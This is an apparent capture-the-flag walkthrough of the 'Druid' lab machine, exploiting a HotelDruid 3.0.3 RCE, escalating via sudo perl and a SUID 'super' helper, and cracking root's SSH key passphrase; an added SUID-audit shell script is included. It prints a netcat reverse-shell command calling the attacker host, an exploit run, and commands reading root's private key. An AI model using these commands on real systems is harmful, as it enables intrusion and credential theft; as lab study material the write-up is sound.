# Lab setup

Download: Druid

Network: NAT, target IP: 192.168.1.128

# Penetration process

# Initial information gathering

```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Hotel
|_http-server-header: Apache/2.4.56 (Debian)
```

Port 80 is open, but directory brute-forcing turns up nothing.

```
┌──(root㉿kali)-[~]
└─# whatweb http://192.168.1.128      
http://192.168.1.128 [200 OK] Apache[2.4.56], Bootstrap, Country[RESERVED][ZZ], Email[[email protected]], HTML5, HTTPServer[Debian Linux][Apache/2.4.56 (Debian)], IP[192.168.1.128], JQuery[3.3.1], Script, Title[Hotel], X-UA-Compatible[IE=edge]
```

whatweb found an e-mail address whose domain looks like the site's real hostname, so add it to /etc/hosts before gathering more: echo '192.168.1.128 hotel.nyx' >> /etc/hosts

Now that the name resolves, brute-force virtual hosts next:

```
┌──(root㉿kali)-[~]
└─# gobuster vhost -u http://hotel.nyx -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 100 --exclude-length 301 --append-domain
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:              http://hotel.nyx
[+] Method:           GET
[+] Threads:          100
[+] Wordlist:         /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:       gobuster/3.6
[+] Timeout:          10s
[+] Append Domain:    true
[+] Exclude Length:   301
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: reservations.hotel.nyx Status: 200 [Size: 398]
```

Add it to /etc/hosts as well: echo '192.168.1.128 reservations.hotel.nyx' >> /etc/hosts

Opening it shows a HotelDruid 3.0.3 install; a quick search for exploits turns up a known RCE (Exploit-DB 50754, CVE-2022-22909) that works here without authentication.

# Exploitation

```
┌──(root㉿kali)-[~]
└─# python 50754.py -t http://reservations.hotel.nyx/ --noauth 
 /$$   /$$             /$$               /$$       /$$$$$$$                      /$$       /$$
| $$  | $$            | $$              | $$      | $$__  $$                    |__/      | $$
| $$  | $$  /$$$$$$  /$$$$$$    /$$$$$$ | $$      | $$  \ $$  /$$$$$$  /$$   /$$ /$$  /$$$$$$$
| $$$$$$$$ /$$__  $$|_  $$_/   /$$__  $$| $$      | $$  | $$ /$$__  $$| $$  | $$| $$ /$$__  $$
| $$__  $$| $$  \ $$  | $$    | $$$$$$$$| $$      | $$  | $$| $$  \__/| $$  | $$| $$| $$  | $$
| $$  | $$| $$  | $$  | $$ /$$| $$_____/| $$      | $$  | $$| $$      | $$  | $$| $$| $$  | $$
| $$  | $$|  $$$$$$/  |  $$$$/|  $$$$$$$| $$      | $$$$$$$/| $$      |  $$$$$$/| $$|  $$$$$$$
|__/  |__/ \______/    \___/   \_______/|__/      |_______/ |__/       \______/ |__/ \_______/
Exploit By - 0z09e (https://twitter.com/0z09e)
[*] Trying to access the Dashboard.
[*] Checking the privilege of the user.
[+] User has the privilege to add room.
[*] Adding a new room.
[+] Room has been added successfully.
[*] Testing code exection
[+] Code executed successfully, Go to http://reservations.hotel.nyx/dati/selectappartamenti.php and execute the code with the parameter 'cmd'.
[+] Example : http://reservations.hotel.nyx/dati/selectappartamenti.php?cmd=id
[+] Example Output : uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

The exploit adds a room whose name carries PHP code; HotelDruid writes the room name into the generated file dati/selectappartamenti.php, so the injected code runs as www-data whenever that file is requested with a cmd parameter. With a netcat listener already waiting on port 4444 of the attacking host (192.168.1.129), trigger a reverse shell:

```
┌──(root㉿kali)-[~]
└─# curl http://reservations.hotel.nyx/dati/selectappartamenti.php?cmd=nc%20192.168.1.129%204444%20-e%20/bin/bash
```

Catch the shell on the listener.

# Privilege escalation

www-data is allowed to run perl as sun through sudo, so switch user with:

sudo -u sun perl -e 'exec "/bin/sh";'

or use perl to spawn a second reverse shell as sun instead.

Once in sun's shell, sudo -l prompts for a password, which we do not have.

So check the SUID binaries instead: super has the SUID bit set.
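Finding the odd one out is quicker when the SUID list is compared against what the distribution is expected to ship. The following is an added example, not from the original writeup: a POSIX sh audit that enumerates SUID executables below a root directory and reports those missing from a baseline file. It goes beyond the writeup's single find by doing the baseline diff, and it builds its own constructed fixture (a fake filesystem tree with a stand-in "super") so it can be exercised without root; the function names and fixture paths are my own.

```sh
#!/bin/sh
# Added example, not from the writeup: list SUID executables and flag the
# ones that are not in an allow-list baseline. On the box this would be run
# against / with the distro's expected set (passwd, su, sudo, ...) as baseline.

# Print SUID regular files below $1 as paths relative to $1, sorted.
suid_list() {
    ( cd "$1" && find . -xdev -type f -perm -4000 2>/dev/null | sort )
}

# Print SUID files below $1 that do not appear in baseline file $2
# (one relative path per line, e.g. ./usr/bin/passwd). grep -vxF keeps only
# lines that are not an exact, full-line match of some baseline entry.
suid_unexpected() {
    suid_list "$1" | grep -vxF -f "$2" || true
}

# Constructed fixture (not the real box): a fake root with one expected SUID
# binary, one unexpected SUID binary and one ordinary executable.
make_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/usr/bin" "$d/usr/local/bin"
    printf '#!/bin/sh\n' > "$d/usr/bin/passwd"       && chmod 4755 "$d/usr/bin/passwd"
    printf '#!/bin/sh\n' > "$d/usr/local/bin/super"  && chmod 4755 "$d/usr/local/bin/super"
    printf '#!/bin/sh\n' > "$d/usr/bin/ls"           && chmod 0755 "$d/usr/bin/ls"
    printf '%s' "$d"
}

# Usage on a live system, with a baseline captured from a clean install:
#   suid_list / > baseline.txt          (on the clean reference machine)
#   suid_unexpected / baseline.txt      (on the target; prints e.g. ./usr/bin/super)
```

Anything the audit prints is a candidate for the `super secret`-style inspection that follows: read its help output, check what it executes, and see whether it will touch files on your behalf.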

super (the Debian package of that name) runs the commands listed in /etc/super.tab with root privileges; running it here shows one such command, secret, and super secret -h reveals that secret simply reverses the text it is given. Got it: use it to read a sensitive file as root and flip the output back: super secret /root/.ssh/id_rsa | rev

That gives us root's private key.

Crack its passphrase:

```
┌──(root㉿kali)-[~]
└─# ssh2john id_rsa > id_rsa.hash

┌──(root㉿kali)-[~]
└─# john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
super1           (id_rsa)     
1g 0:00:00:00 DONE (2024-05-21 23:07) 33.33g/s 166400p/s 166400c/s 166400C/s jimmie..david123
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

The passphrase is super1.

SSH in as root with the key and that passphrase, and the box is rooted.

# Summary

Get familiar with more programs: I had never seen super or secret before, so it came down to guessing.

In vi, :1,$d quickly deletes every line, and :5,8d deletes lines 5 through 8.